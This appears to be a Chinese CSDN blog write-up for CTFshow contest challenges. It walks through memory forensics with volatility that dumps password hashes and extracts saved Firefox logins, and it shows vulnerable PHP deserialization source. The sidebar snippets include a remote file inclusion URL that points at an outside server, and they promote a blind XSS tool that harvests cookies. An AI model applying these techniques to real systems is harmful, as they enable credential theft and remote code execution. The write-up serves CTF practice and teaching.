[CTFshow]吃鸡杯

最新推荐文章于 2024-06-03 15:38:16 发布
最新推荐文章于 2024-06-03 15:38:16 发布
阅读量1k 收藏 1
点赞数
分类专栏: 比赛wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/119418600
版权

在?看看密码

给了一个vmem文件,内存取证
在这里插入图片描述
搞密码肯定一开始想到系统用户的密码

volatility --profile=Win7SP1x64 -f looklookpassword.vmem hivelist

在这里插入图片描述

volatility --profile=Win7SP1x64 -f looklookpassword.vmem hashdump -y 0xfffff8a000024010 -s 0xfffff8a000dd7010

找一下竟然没有密码
在这里插入图片描述

那可能是浏览器里面保存了的密码

 volatility --profile=Win7SP1x64 -f looklookpassword.vmem pslist

Firefox的很多,先试试这个
在这里插入图片描述
需要dump出两个文件
key4.dblogins.json

volatility -f looklookpassword.vmem --profile=Win7SP1x64 filescan |grep 'key4.db'
volatility -f looklookpassword.vmem --profile=Win7SP1x64 filescan |grep 'logins.json'

在这里插入图片描述
在这里插入图片描述
dump出来

volatility -f looklookpassword.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000003d6ab4b0 -D ./
volatility -f looklookpassword.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000003ec70d00 -D ./

把名字改成key4.db和logins.json
在这里插入图片描述
打开passwordfox,选择这个文件夹,他会自动搞出密码
在这里插入图片描述

cjbweb

<?php
error_reporting(0);
$safe="Hack me!";

class Hacker{
   
    public $name="var_dump";
    public $msg="Happy to cjb";
    public function __wakeup()
    {
   
        global $safe;
        if(preg_match('/\d|\/|,|\([^()]*\([^()]*\)/',$this->msg)){
   
            $this->name="var_dump";
            $this->msg="You look dangerous!!!";
            $safe="I think waf is enough.";
        }
        call_user_func($this->name,$this->msg);
    }
    public function __destruct()
    {
   
        global $safe;
        var_dump($safe);
    }
}

if(isset($_POST['info'])){
   
    $info=$_POST['info'];
    if(
最低0.47元/天 解锁文章
huamanggg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ezXSSezXSS是渗透测试人员和漏洞赏金猎人测试(盲目)跨站点脚本的一种简便方法
02-05
ezXSS是渗透测试人员和漏洞赏金猎人测试(盲目)跨站点脚本的一种简便方法。 产品特点 易于使用的仪表板,带有统计信息,有效载荷,查看/共享/搜索报告 有效载荷发生器 通过邮件,电报或自定义回调URL发出即时警报 自定义JavaScript负载 自定义有效负载链接以区分插入点 阻止,白名单和其他过滤器 通过电子邮件或其他ezXSS用户通过直接链接共享报告 使用两因素(2FA)保护您的登录 可以在易受攻击的页面上收集以下信息: 页面的URL IP地址 任何页面引荐来源网址(或共享引荐来源网址) 用户代理 所有非HTTP专用Cookie 所有区域设置存储 所有会话存储 页面的完整HTML
CTFshow-菜狗-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow XSS专题
yink12138的博客
12-17 1480
ctfshow XSS专题
CTFShow2021七月赛Web
feng的博客
07-10 953
CTFShow2021七月赛Web warmup $ext = pathinfo($_GET['file'], PATHINFO_EXTENSION); if($ext==='php'){ include $_GET['file']; } 要求文件后缀为php,经过测试可以远程文件包含。VPS上写个php马直接包含即可。 ?file=http://118.31.168.198:39543/feng.php 0=phpinfo(); 存在disable_functi
ezXSS:一款功能强大的XSS盲测工具
最新发布
2401_84466227的博客
06-03 748
ezXSS当前所支持的全部功能如下:1. 提供了易于使用的仪表盘(Dashboard),用户可查看、分享和搜索漏洞报告;2. Payload生成器;3. 实时电子邮件警报;4. 自定义JavaScript以进行额外测试;5. 跟其他ezXSS用户分享漏洞报告;6. 可直接在系统中管理和查看报告;7. 利用额外的保护机制(2FA)保护系统账号的安全;ezXSS可从存在安全漏洞的页面中收集下列信息:1. 页面中的URL;2. IP地址;
CTF刷题第三周
m0re's blog
04-01 2419
本文目录Misc坚持60s Misc 坚持60s 打开发现是个java写的小程序好像,看了一脸懵*。 完全没搞懂咋玩,也不会动。一点思路都没有。 看wp,提到了一个java反编译的工具。没见过这种题。没见过就要记下来嘛,而且我最喜欢的就是玩这种我不知道的工具,又可以收一个。 jd-gui,这个工具,下载链接jd-gui提取码9ggk 下载后不用解压,我分享的是文件夹。直接打开工具用(无需安装)...
攻防世界--Web进阶--Web_php_unserialize--反序列化---正则表达式---wakeup绕过----base64加密
z2560088的博客
10-10 1243
来自攻防世界的一道web进阶题,名为Web_php_unserialize 题目给出了一段php代码,应该是后台的部分源码: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//将file变量的文件名赋值给当前类的file。当解构出该类实例化的对象后,该对象的file就是此时赋值的fi..
(日更)PHP反序化漏洞解析(3) 漏洞利用条件及利用实例 XCTFWeb_php_unserialize
AAAAAAAAAAAA66的博客
11-28 812
------------------------------------------------------------------------------------------------------------------ 昨天打了一场CTF,断更了一天。。。 ------------------------------------------------------------------------------------------------------------------ .
UNCTF2022-公开赛|Crypto
zerorzeror的博客
11-20 561
UNCTF2022-公开赛|Crypto
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
[ctf.show.reverse] 吃鸡 ezmore,有手就行,EzAutoRe
weixin_52640415的博客
04-27 489
ezmore 动调的题,跟进去在4019d6下断点看比较情况得到neft输入后得到flag组成提示 有手就行 一上来就猜入口是_main然后解到一个fake s2 = [99,23,113,2,106,5,114,9,109,2,93,36,75,62,97,13,100,15,106,53,83,50,89,60,3,60,65] s1 = [0]*len(s2) s1[0] = 99 #~(*(v1 - 2) & v2) & (*(v1 - 2) ^ v2) #~(s1[i-1
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
Jay17的博客
09-28 4340
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
CTFshow_warmup
tlp_zzm的博客
04-02 351
还有一个点就是这里的result其实没啥用,这个加密函数其实还是以指针寻址,对单个字节进行加密,这个函数返回类型其实应该是void,但IDA反编译成了int64,你可以在int64按下v键将其变成无参数返回类型的函数,或者按y键改为void类型的函数。还是老样子,忽略一切与明文无关的代码,这里源代码主要做了几个处理,第一个就是通过fgets输入的时候会把换行符输入到数组里面,后面if只是把对应的参数改为0了,key的话,动调直接得出来。if函数就是把换行符换成00,没啥用,加密函数循环127次也没啥用。
ctfshow 2021/7/9-10 吃鸡 6题
mumuzi的博客
07-10 1396
群主说要出简单的题目大家把这题想简单一点 直接把c转字符串即可 from libnum import * print(n2s(7539424334663709603622451394173266049480031393220309445902319310504736287365860451132752036622339554159799611768328686792828750952551268647863160547774237934958072391797341405165512721597085695
ctfshow XSS
quan9i的博客
06-28 1153
ctfshow XSS 316-333
CTFshow-吃鸡-RE
qq_52974719的博客
08-02 672
这里写目录标题1、ezmore2、有手就行 1、ezmore 1、初步分析 exe文件,直接运行,可知要得到与flag相关的信息需要输入正确的文件下载码。 查下壳:32二位文件,直接ida32打开 2、静态分析 最开始的输入,然后跟一个if判断,其中i=2时为主要逻辑。 str内存储着我们输入的下闸码,接着进入了e2edef40ecaa776b8d32d58416998这个函数进行检验,v2是我们输入的编号,毫无疑问v2=8 函数主要是生成了一个str2,和我们的输入str1最终进行比较,可知前几句主
ctfshow渔人
09-14
ctfshow渔人是一个CTF(Capture The Flag)比赛,它是以网络安全为主题的竞赛。在这个比赛中,参赛者需要解决各种网络安全相关的问题,包括密码学、漏洞利用、逆向工程等。比赛的目标是通过获取旗帜(flag)来获得分数。 在引用中提到了一个flag: flag{8f9ed2f933ef14a8d0523d0349e1299c}。这是一个由数字和字母组成的字符串,通常在CTF比赛中表示获得了一个旗帜。 引用中提到了另一个flag: ctfshow{a15b2830-dcf4-4344-99e5-350a561cbf89}。这个flag是一个由字母和数字组成的字符串,通常也在CTF比赛中表示获得了一个旗帜。 引用中提到了ctfshow渔人的一些其他信息,包括比赛的题目和一些描述。 综上所述,ctfshow渔人是一个与网络安全相关的CTF比赛,参赛者需要解决各种网络安全问题并获取旗帜来获得分数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值